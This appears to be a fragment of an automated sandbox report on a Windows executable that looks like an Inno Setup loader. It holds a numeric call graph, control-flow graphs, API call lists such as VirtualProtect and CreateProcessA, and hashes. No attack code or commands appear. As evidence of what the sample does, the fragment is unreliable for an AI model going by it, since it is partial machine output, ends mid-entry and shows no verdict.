5855->5857 5867 40188c 5856->5867 5859 40188c 3 API calls 5857->5859 5860 401cad 5859->5860 5861 401b44 9 API calls 5860->5861 5866 401cc5 5860->5866 5862 401cd4 5861->5862 5863 401cee 5862->5863 5877 401b98 5862->5877 5882 4013a0 5863->5882 5866->5783 5868 4018b2 5867->5868 5876 40190b 5867->5876 5886 401658 5868->5886 5871 40132c LocalAlloc 5872 4018cf 5871->5872 5873 40150c VirtualFree 5872->5873 5874 4018e6 5872->5874 5873->5874 5875 4013a0 LocalAlloc 5874->5875 5874->5876 5875->5876 5876->5860 5878 401bab 5877->5878 5879 401b9d 5877->5879 5878->5863 5880 401b74 9 API calls 5879->5880 5881 401baa 5880->5881 5881->5863 5883 4013ab 5882->5883 5884 4013c6 5883->5884 5885 4012e4 LocalAlloc 5883->5885 5884->5866 5885->5884 5888 40168f 5886->5888 5887 4016cf 5887->5871 5888->5887 5889 4016a9 VirtualFree 5888->5889 5889->5888 6846 402dfa 6847 402e0d 6846->6847 6849 
402e26 6846->6849 6850 402ba4 6847->6850 6851 402bc9 6850->6851 6852 402bad 6850->6852 6851->6849 6853 402bb5 RaiseException 6852->6853 6853->6851 6854 4075fa GetFileSize 6855 407626 6854->6855 6856 407616 GetLastError 6854->6856 6856->6855 6857 40761f 6856->6857 6858 40748c 35 API calls 6857->6858 6858->6855 6859 406ffb 6860 407008 SetErrorMode 6859->6860 6528 403a80 CloseHandle 6529 403a90 6528->6529 6530 403a91 GetLastError 6528->6530 6531 404283 6532 4042c3 6531->6532 6533 403154 4 API calls 6532->6533 6534 404323 6533->6534 6861 404185 6862 4041ff 6861->6862 6863 4041cc 6862->6863 6864 403154 4 API calls 6862->6864 6865 404323 6864->6865 6535 403e87 6536 403e4c 6535->6536 6537 403e62 6536->6537 6538 403e7b 6536->6538 6541 403e67 6536->6541 6544 403cc8 6537->6544 6539 402674 4 API calls 6538->6539 6542 403e78 6539->6542 6541->6542 6548 402674 6541->6548 6545 403cd6 6544->6545 6546 402674 4 API calls 6545->6546 6547 403ceb 6545->6547 6546->6547 6547->6541 6549 403154 4 API calls 6548->6549 6550 40267a 6549->6550 6550->6542 6559 407e90 6560 407eb8 VirtualFree 6559->6560 6561 407e9d 6560->6561 6564 403e95 6565 403e4c 6564->6565 6566 403e62 6565->6566 6567 403e7b 6565->6567 6570 403e67 6565->6570 6569 403cc8 4 API calls 6566->6569 6568 402674 4 API calls 6567->6568 6571 403e78 6568->6571 6569->6570 6570->6571 6572 402674 4 API calls 6570->6572 6572->6571 6573 40ac97 6582 4096fc 6573->6582 6576 402f24 5 API calls 6577 40aca1 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc0 6578->6579 6580 403198 4 API calls 6579->6580 6581 40acc8 6580->6581 6591 4056ac 6582->6591 6584 409745 6587 403198 4 API calls 6584->6587 6585 409717 6585->6584 6597 40720c 6585->6597 6589 40975a 6587->6589 6588 409735 6590 40973d MessageBoxA 6588->6590 6589->6576 6589->6577 6590->6584 6592 403154 4 API calls 6591->6592 6594 4056b1 6592->6594 6593 4056c9 6593->6585 6594->6593 6595 403154 4 API calls 6594->6595 6596 4056bf 6595->6596 6596->6585 6598 4056ac 4 API calls 6597->6598 6599 
40721b 6598->6599 6600 407221 6599->6600 6603 40722f 6599->6603 6601 40322c 4 API calls 6600->6601 6602 40722d 6601->6602 6602->6588 6604 40724b 6603->6604 6605 40723f 6603->6605 6615 4032b8 6604->6615 6608 4071d0 6605->6608 6609 40322c 4 API calls 6608->6609 6610 4071df 6609->6610 6611 4071fc 6610->6611 6612 406950 CharPrevA 6610->6612 6611->6602 6613 4071eb 6612->6613 6613->6611 6614 4032fc 18 API calls 6613->6614 6614->6611 6616 403278 18 API calls 6615->6616 6617 4032c2 6616->6617 6617->6602 6618 403a97 6619 403aac 6618->6619 6620 403ab2 6619->6620 6621 403bbc GetStdHandle 6619->6621 6622 403b0e CreateFileA 6619->6622 6623 403c17 GetLastError 6621->6623 6635 403bba 6621->6635 6622->6623 6624 403b2c 6622->6624 6623->6620 6625 403b3b GetFileSize 6624->6625 6624->6635 6625->6623 6627 403b4e SetFilePointer 6625->6627 6627->6623 6631 403b6a ReadFile 6627->6631 6628 403be7 GetFileType 6628->6620 6630 403c02 CloseHandle 6628->6630 6630->6620 6631->6623 6632 403b8c 6631->6632 6633 403b9f SetFilePointer 6632->6633 6632->6635 6633->6623 6634 403bb0 SetEndOfFile 6633->6634 6634->6623 6634->6635 6635->6620 6635->6628 6640 40aaa2 6641 40aad2 6640->6641 6642 40aadc CreateWindowExA SetWindowLongA 6641->6642 6643 405194 33 API calls 6642->6643 6644 40ab5f 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab6d 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab7a 6647->6648 6649 406b7c 19 API calls 6648->6649 6650 40ab86 6649->6650 6651 4032fc 18 API calls 6650->6651 6652 40ab8f 6651->6652 6653 4099ec 43 API calls 6652->6653 6654 40aba1 6653->6654 6655 4098cc 19 API calls 6654->6655 6656 40abb4 6654->6656 6655->6656 6657 40abed 6656->6657 6658 4094d8 9 API calls 6656->6658 6659 40ac06 6657->6659 6662 40ac00 RemoveDirectoryA 6657->6662 6658->6657 6660 40ac1a 6659->6660 6661 40ac0f DestroyWindow 6659->6661 6663 40ac42 6660->6663 6664 40357c 4 API calls 6660->6664 6661->6660 6662->6659 6665 40ac38 6664->6665 6666 4025ac 4 API calls 6665->6666 6666->6663 6878 405ba2 6880 
405ba4 6878->6880 6879 405be0 6881 405940 19 API calls 6879->6881 6880->6879 6882 405bf7 6880->6882 6883 405bda 6880->6883 6891 405bf3 6881->6891 6886 404cdc 19 API calls 6882->6886 6883->6879 6884 405c4c 6883->6884 6885 4059b0 33 API calls 6884->6885 6885->6891 6887 405c20 6886->6887 6889 4059b0 33 API calls 6887->6889 6888 403198 4 API calls 6890 405c86 6888->6890 6889->6891 6891->6888 6892 408da4 6893 408dc8 6892->6893 6894 408c80 18 API calls 6893->6894 6895 408dd1 6894->6895 6667 402caa 6668 403154 4 API calls 6667->6668 6669 402caf 6668->6669 6910 4011aa 6911 4011ac GetStdHandle 6910->6911 6670 4028ac 6671 402594 18 API calls 6670->6671 6672 4028b6 6671->6672 4982 40aab4 4983 40aab8 SetLastError 4982->4983 5014 409648 GetLastError 4983->5014 4986 40aad2 4988 40aadc CreateWindowExA SetWindowLongA 4986->4988 5027 405194 4988->5027 4992 40ab6d 4993 4032fc 18 API calls 4992->4993 4994 40ab7a 4993->4994 5044 406b7c GetCommandLineA 4994->5044 4997 4032fc 18 API calls 4998 40ab8f 4997->4998 5049 4099ec 4998->5049 5000 40aba1 5002 40abb4 5000->5002 5070 4098cc 5000->5070 5003 40abd4 5002->5003 5004 40abed 5002->5004 5076 4094d8 5003->5076 5006 40ac06 5004->5006 5009 40ac00 RemoveDirectoryA 5004->5009 5007 40ac1a 5006->5007 5008 40ac0f DestroyWindow 5006->5008 5013 40ac42 5007->5013 5084 40357c 5007->5084 5008->5007 5009->5006 5011 40ac38 5097 4025ac 5011->5097 5101 404c94 5014->5101 5022 4096c3 5116 4031b8 5022->5116 5028 4051a8 33 API calls 5027->5028 5029 4051a3 5028->5029 5030 4032fc 5029->5030 5031 403300 5030->5031 5032 40333f 5030->5032 5033 4031e8 5031->5033 5034 40330a 5031->5034 5032->4992 5040 403254 18 API calls 5033->5040 5041 4031fc 5033->5041 5035 403334 5034->5035 5036 40331d 5034->5036 5037 4034f0 18 API calls 5035->5037 5277 4034f0 5036->5277 5043 403322 5037->5043 5038 403228 5038->4992 5040->5041 5041->5038 5042 4025ac 4 API calls 5041->5042 5042->5038 5043->4992 5303 406af0 5044->5303 5046 406ba1 5047 403198 4 API calls 5046->5047 5048 406bbf 
5047->5048 5048->4997 5317 4033b4 5049->5317 5051 409a27 5052 409a59 CreateProcessA 5051->5052 5053 409a65 5052->5053 5054 409a6c CloseHandle 5052->5054 5056 409648 35 API calls 5053->5056 5055 409a75 5054->5055 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5055->5057 5056->5054 5058 409a7a MsgWaitForMultipleObjects 5057->5058 5058->5055 5059 409a91 5058->5059 5060 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5059->5060 5061 409a96 GetExitCodeProcess CloseHandle 5060->5061 5062 409ab6 5061->5062 5063 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5064 409abe 5063->5064 5064->5000 5065 402f24 5066 403154 4 API calls 5065->5066 5067 402f29 5066->5067 5323 402bcc 5067->5323 5069 402f51 5069->5069 5071 40990e 5070->5071 5072 4098d4 5070->5072 5071->5002 5072->5071 5073 403420 18 API calls 5072->5073 5074 409908 5073->5074 5326 408e80 5074->5326 5077 409532 5076->5077 5081 4094eb 5076->5081 5077->5004 5078 4094f3 Sleep 5078->5081 5079 409503 Sleep 5079->5081 5081->5077 5081->5078 5081->5079 5082 40951a GetLastError 5081->5082 5349 408fbc 5081->5349 5082->5077 5083 409524 GetLastError 5082->5083 5083->5077 5083->5081 5087 403591 5084->5087 5093 4035a0 5084->5093 5085 4035b1 5088 403198 4 API calls 5085->5088 5086 4035b8 5089 4031b8 4 API calls 5086->5089 5090 4035d0 5087->5090 5091 40359b 5087->5091 5092 4035b6 5087->5092 5088->5092 5089->5092 5090->5092 5095 40357c 4 API calls 5090->5095 5091->5093 5094 4035ec 5091->5094 5092->5011 5093->5085 5093->5086 5094->5092 5366 403554 5094->5366 5095->5090 5098 4025b0 5097->5098 5100 4025ba 5097->5100 5099 403154 4 API calls 5098->5099 5098->5100 5099->5100 5100->5013 5124 4051a8 5101->5124 5104 407284 FormatMessageA 5105 4072aa 5104->5105 5106 403278 18 API calls 5105->5106 5107 4072c7 5106->5107 5108 408da8 5107->5108 5109 408dc8 5108->5109 5267 408c80 5109->5267 5112 405890 5113 405897 5112->5113 5114 4031e8 18 API calls 5113->5114 5115 4058af 5114->5115 5115->5022 5118 4031be 
5116->5118 5117 4031e3 5120 403198 5117->5120 5118->5117 5119 4025ac 4 API calls 5118->5119 5119->5118 5121 4031b7 5120->5121 5122 40319e 5120->5122 5121->4986 5121->5065 5122->5121 5123 4025ac 4 API calls 5122->5123 5123->5121 5125 4051c5 5124->5125 5132 404e58 5125->5132 5128 4051f1 5137 403278 5128->5137 5134 404e73 5132->5134 5133 404e85 5133->5128 5142 404be4 5133->5142 5134->5133 5145 404f7a 5134->5145 5152 404e4c 5134->5152 5138 403254 18 API calls 5137->5138 5139 403288 5138->5139 5140 403198 4 API calls 5139->5140 5141 4032a0 5140->5141 5141->5104 5259 405940 5142->5259 5144 404bf5 5144->5128 5146 404f8b 5145->5146 5150 404fd9 5145->5150 5149 40505f 5146->5149 5146->5150 5148 404ff7 5148->5134 5149->5148 5159 404e38 5149->5159 5150->5148 5155 404df4 5150->5155 5153 403198 4 API calls 5152->5153 5154 404e56 5153->5154 5154->5134 5156 404e02 5155->5156 5162 404bfc 5156->5162 5158 404e30 5158->5150 5189 4039a4 5159->5189 5165 4059b0 5162->5165 5164 404c15 5164->5158 5166 4059be 5165->5166 5175 404cdc LoadStringA 5166->5175 5169 405194 33 API calls 5170 4059f6 5169->5170 5178 4031e8 5170->5178 5173 4031b8 4 API calls 5174 405a1b 5173->5174 5174->5164 5176 403278 18 API calls 5175->5176 5177 404d09 5176->5177 5177->5169 5179 4031ec 5178->5179 5182 4031fc 5178->5182 5179->5182 5184 403254 5179->5184 5180 403228 5180->5173 5182->5180 5183 4025ac 4 API calls 5182->5183 5183->5180 5185 403274 5184->5185 5186 403258 5184->5186 5185->5182 5187 402594 18 API calls 5186->5187 5188 403261 5187->5188 5188->5182 5190 4039ab 5189->5190 5195 4038b4 5190->5195 5192 4039cb 5193 403198 4 API calls 5192->5193 5194 4039d2 5193->5194 5194->5148 5196 4038d5 5195->5196 5197 4038c8 5195->5197 5199 403934 5196->5199 5200 4038db 5196->5200 5223 403780 5197->5223 5201 403993 5199->5201 5202 40393b 5199->5202 5203 4038e1 5200->5203 5204 4038ee 5200->5204 5205 4037f4 3 API calls 5201->5205 5206 403941 5202->5206 5207 40394b 5202->5207 5230 403894 5203->5230 5210 403894 6 API calls 
5204->5210 5208 4038d0 5205->5208 5245 403864 5206->5245 5213 4037f4 3 API calls 5207->5213 5208->5192 5211 4038fc 5210->5211 5235 4037f4 5211->5235 5215 40395d 5213->5215 5217 403864 23 API calls 5215->5217 5216 403917 5241 40374c 5216->5241 5218 403976 5217->5218 5220 40374c VariantClear 5218->5220 5222 40398b 5220->5222 5221 40392c 5221->5192 5222->5192 5224 4037f0 5223->5224 5229 403744 5223->5229 5224->5208 5225 403793 VariantClear 5225->5229 5226 4037ab 5226->5208 5227 4037dc VariantCopyInd 5227->5224 5227->5229 5228 403198 4 API calls 5228->5229 5229->5223 5229->5225 5229->5226 5229->5227 5229->5228 5250 4036b8 5230->5250 5233 40374c VariantClear 5234 4038a9 5233->5234 5234->5208 5236 403845 VariantChangeTypeEx 5235->5236 5237 40380a VariantChangeTypeEx 5235->5237 5240 403832 5236->5240 5238 403826 5237->5238 5239 40374c VariantClear 5238->5239 5239->5240 5240->5216 5242 403766 5241->5242 5243 403759 5241->5243 5242->5221 5243->5242 5244 403779 VariantClear 5243->5244 5244->5221 5256 40369c SysStringLen 5245->5256 5248 40374c VariantClear 5249 403882 5248->5249 5249->5208 5251 4036cb 5250->5251 5252 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5251->5252 5253 4036db 5251->5253 5254 40372e 5252->5254 5255 4036ed MultiByteToWideChar SysAllocStringLen 5253->5255 5254->5233 5255->5254 5257 403610 21 API calls 5256->5257 5258 4036b3 5257->5258 5258->5248 5260 40594c 5259->5260 5261 404cdc 19 API calls 5260->5261 5262 405972 5261->5262 5263 4031e8 18 API calls 5262->5263 5264 40597d 5263->5264 5265 403198 4 API calls 5264->5265 5266 405992 5265->5266 5266->5144 5268 403198 4 API calls 5267->5268 5270 408cb1 5267->5270 5268->5270 5269 4031b8 4 API calls 5271 408d69 5269->5271 5272 408cc8 5270->5272 5273 403278 18 API calls 5270->5273 5275 4032fc 18 API calls 5270->5275 5276 408cdc 5270->5276 5271->5112 5274 4032fc 18 API calls 5272->5274 5273->5270 5274->5276 5275->5270 5276->5269 5278 4034fd 5277->5278 5285 40352d 5277->5285 5280 403526 
5278->5280 5283 403509 5278->5283 5279 403198 4 API calls 5282 403517 5279->5282 5281 403254 18 API calls 5280->5281 5281->5285 5282->5043 5286 4025c4 5283->5286 5285->5279 5287 4025ca 5286->5287 5288 4025dc 5287->5288 5290 403154 5287->5290 5288->5282 5288->5288 5291 403164 5290->5291 5292 40318c TlsGetValue 5290->5292 5291->5288 5293 403196 5292->5293 5294 40316f 5292->5294 5293->5288 5298 40310c 5294->5298 5296 403174 TlsGetValue 5297 403184 5296->5297 5297->5288 5299 403120 LocalAlloc 5298->5299 5300 403116 5298->5300 5301 40313e TlsSetValue 5299->5301 5302 403132 5299->5302 5300->5299 5301->5302 5302->5296 5304 406b1c 5303->5304 5305 403278 18 API calls 5304->5305 5306 406b29 5305->5306 5313 403420 5306->5313 5308 406b31 5309 4031e8 18 API calls 5308->5309 5310 406b49 5309->5310 5311 403198 4 API calls 5310->5311 5312 406b6b 5311->5312 5312->5046 5314 403426 5313->5314 5316 403437 5313->5316 5315 403254 18 API calls 5314->5315 5314->5316 5315->5316 5316->5308 5318 4033bc 5317->5318 5319 403254 18 API calls 5318->5319 5320 4033cf 5319->5320 5321 4031e8 18 API calls 5320->5321 5322 4033f7 5321->5322 5324 402bd5 RaiseException 5323->5324 5325 402be6 5323->5325 5324->5325 5325->5069 5327 408e8e 5326->5327 5329 408ea6 5327->5329 5339 408e18 5327->5339 5330 408e18 18 API calls 5329->5330 5331 408eca 5329->5331 5330->5331 5342 407918 5331->5342 5333 408ee5 5334 408e18 18 API calls 5333->5334 5336 408ef8 5333->5336 5334->5336 5335 408e18 18 API calls 5335->5336 5336->5335 5337 403278 18 API calls 5336->5337 5338 408f27 5336->5338 5337->5336 5338->5071 5340 405890 18 API calls 5339->5340 5341 408e29 5340->5341 5341->5329 5345 4078c4 5342->5345 5346 4078d6 5345->5346 5347 4078e7 5345->5347 5348 4078db InterlockedExchange 5346->5348 5347->5333 5348->5347 5357 408f70 5349->5357 5351 408fd6 5351->5081 5352 408fd2 5352->5351 5353 408ff2 DeleteFileA GetLastError 5352->5353 5354 409010 5353->5354 5363 408fac 5354->5363 5358 408f7a 5357->5358 5359 408f7e 5357->5359 5358->5352 
5360 408fa0 SetLastError 5359->5360 5361 408f87 Wow64DisableWow64FsRedirection 5359->5361 5362 408f9b 5360->5362 5361->5362 5362->5352 5364 408fb1 Wow64RevertWow64FsRedirection 5363->5364 5365 408fbb 5363->5365 5364->5365 5365->5081 5367 403566 5366->5367 5369 403578 5367->5369 5370 403604 5367->5370 5369->5094 5371 40357c 5370->5371 5376 40359b 5371->5376 5377 4035b6 5371->5377 5378 4035d0 5371->5378 5379 4035a0 5371->5379 5372 4035b1 5374 403198 4 API calls 5372->5374 5373 4035b8 5375 4031b8 4 API calls 5373->5375 5374->5377 5375->5377 5376->5379 5380 4035ec 5376->5380 5377->5367 5378->5377 5381 40357c 4 API calls 5378->5381 5379->5372 5379->5373 5380->5377 5382 403554 4 API calls 5380->5382 5381->5378 5382->5380 6673 401ab9 6674 401a96 6673->6674 6675 401aa9 RtlDeleteCriticalSection 6674->6675 6676 401a9f RtlLeaveCriticalSection 6674->6676 6676->6675

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                    • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2441996862-0
                                                                                                    • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                    • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                    • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                    • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                    • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                    • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                    • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                    • API String ID: 3256987805-3653653586
                                                                                                    • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                    • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                    • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                    • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02262480), ref: 0040966C
                                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                    • SetWindowLongA.USER32(000103F2,000000FC,00409960), ref: 0040AB15
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                    • DestroyWindow.USER32(000103F2,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                    • API String ID: 3757039580-3001827809
                                                                                                    • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                    • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                    • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                    • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                    • API String ID: 1646373207-2130885113
                                                                                                    • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                    • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                    • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                    • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                    • SetWindowLongA.USER32(000103F2,000000FC,00409960), ref: 0040AB15
                                                                                                      • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                      • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                      • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000), ref: 00409A70
                                                                                                      • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                      • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                      • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8), ref: 00409AA4
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                    • DestroyWindow.USER32(000103F2,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
